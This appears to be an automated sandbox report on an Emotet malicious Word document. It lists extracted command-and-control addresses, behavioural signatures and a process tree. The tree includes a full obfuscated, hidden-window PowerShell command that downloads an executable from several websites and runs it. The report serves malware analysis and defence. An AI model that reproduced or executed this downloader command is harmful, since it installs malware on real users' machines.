Analysis

  • max time kernel
    150s
  • max time network
    156s
  • resource
    win10v191014

General

  • Target

    Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99

  • Sample

    191212-dbqq6ew7ds

  • SHA256

    5df1f1341851c837a5892bd964c406fe101dd9154c3b5c1df36eb95372c604e0

Score
N/A

Malware Config

Extracted

Family

emotet

C2

190.146.14.143:443

85.235.219.74:80

78.187.204.70:80

46.105.128.215:8080

69.30.205.162:7080

192.161.190.171:8080

163.172.97.112:8080

86.98.157.3:80

113.52.135.33:7080

175.127.140.68:80

212.129.14.27:8080

200.41.121.69:443

143.95.101.72:8080

190.161.67.63:80

50.116.78.109:8080

37.46.129.215:8080

119.57.36.54:8080

212.112.113.235:80

46.105.131.68:8080

1.32.54.12:8080

rsa_pubkey.plain

Signatures

  • Windows security modification 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops Office document 4 IoCs
  • Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Drops file in system dir 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet Sync 1 IoCs
  • emotet family
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.99.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Drops Office document
    • Checks processor information in registry (likely anti-VM)
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks system information in the registry (likely anti-VM)
    PID:5004
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2460
  • C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
    1⤵
      PID:3092
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABZAGwAcABnAGQAegBtAGIAPQAnAFUAcwBzAGIAYgBtAHoAaAB1AGgAeABrAGUAJwA7ACQATABnAGUAZABrAGsAZABxAHcAIAA9ACAAJwAxADcANwAnADsAJABJAHoAegBxAHoAaABxAHoAdAB5AHoAPQAnAEEAaQBkAHcAagBxAG4AbABjAGoAeABlAGoAJwA7ACQARABiAGIAcwBrAHAAdwBhAHoAdgBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGcAZQBkAGsAawBkAHEAdwArACcALgBlAHgAZQAnADsAJABFAG4AaABsAGsAcABxAG0APQAnAFkAbQBjAHQAaABjAG4AagBrAHUAeQAnADsAJABCAHkAdwB3AG0AegB5AHAAbgBlAD0AJgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMATABJAEUAbgBUADsAJABGAGkAdgBsAHcAbAB6AG8AeQB1AHUAdABsAD0AJwBoAHQAdABwADoALwAvAGEAYwBxAHUAYQAuAHMAbwBsAGEAcgBjAHkAdABlAGMALgBjAG8AbQAvAHIAdABzAGIAZwBzAC8AWABpAFcAbQB0AFkAWQB1AHIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AbABlAGEAcgBuAGMAeQAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AdQBzAGUAcgAvAG8AeABaAHEAUQBwAC8AKgBoAHQAdABwADoALwAvAGgAbwBzAHAAaQB0AGEAbABzAGEAbgByAGEAZgBhAGUAbAAuAGEAaQBuAGkAbQBlAGQAaQBuAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAdwBmAC0AaQA4AGcAZQAtADQANAA0ADUAOQAxADcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGcANwA3ADEALgBrAHcAaQBrAGYAdQBuAG4AZQBsAHMALgBjAG8AbQAvAHAAaABwAG0AeQBhAGQAbQBpAG4AXwBiAGMAawAvAHgAOQB0AGYAbgAtAGwAdgAxAGgANAAtADEANwA0ADEAMgA5ADUAOQA2AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwBpAHkAaQBuAGoAaQBjAGgAYQBuAGcAagBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBXAFkAcwB6AHMAUAAvACcALgAiAFMAYABQAGwASQB0ACIAKAAnACoAJwApADsAJABVAG4AaABjAGcAcQBiAG0AcABmAG0APQAnAFIAbgBmAGgAagB3AGIAaABsACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAgAGkAbgAgACQARgBpAHYAbAB3AGwAegBvAHkAdQB1AHQAbAApAHsAdAByAHkAewAkAEIAeQB3AHcAbQB6AHkAcABuAGUALgAiAEQAbwB3AE4AbABvAGAAQQBkAGYAYABJAEwAZQAiACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAsACAAJABEAGIAYgBzAGsAcAB3AGEAegB2AGYAKQA7ACQAUwB1AGcAawB1AHoAaQBmAGwAeQA9ACcAQwBuAGoAdgBhAGMAaQBnAHEAeQBhAGwAegAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgAyADkAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgB0ACIAKAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApADsAJABDAHIAZwBpAGsAdwBqAGwAawBxAD0AJwBYAGgAagBoAGUAcQBkAHQAegBhAGEAJwA7AGIAcgBlAGEAawA7ACQAVwB2AHQAdQB2AGwAcgB3AD0AJwBUAHMAZQBuAGYAZQB5AGwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBqAGoAcAB0AGcAaQBhAGsAawA9ACcAQgBmAG4AYgBwAHIAcABmAGEAdQBhACcA
      1⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:4740
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Drops file in system dir
      PID:3920
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
      1⤵
        PID:4188
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
        1⤵
        • Checks system information in the registry (likely anti-VM)
        PID:3004
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k unistacksvcgroup
        1⤵
          PID:4936
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
          1⤵
          • Windows security modification
          PID:4612
        • C:\Users\Admin\177.exe
          "C:\Users\Admin\177.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4292
        • C:\Users\Admin\177.exe
          --653e7fcf
          1⤵
          • Suspicious behavior: EmotetMutantsSpam
          • Executes dropped EXE
          • Emotet Sync
          • Suspicious use of SetWindowsHookEx
          PID:3540

        Network

        MITRE ATT&CK Enterprise v15

        MITRE ATT&CK Additional techniques

        • T1089

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/3540-19-0x0000000002050000-0x0000000002067000-memory.dmp

          Filesize

          92KB

        • memory/3540-20-0x0000000000400000-0x0000000000495000-memory.dmp

          Filesize

          596KB

        • memory/4292-17-0x00000000022B0000-0x00000000022C7000-memory.dmp

          Filesize

          92KB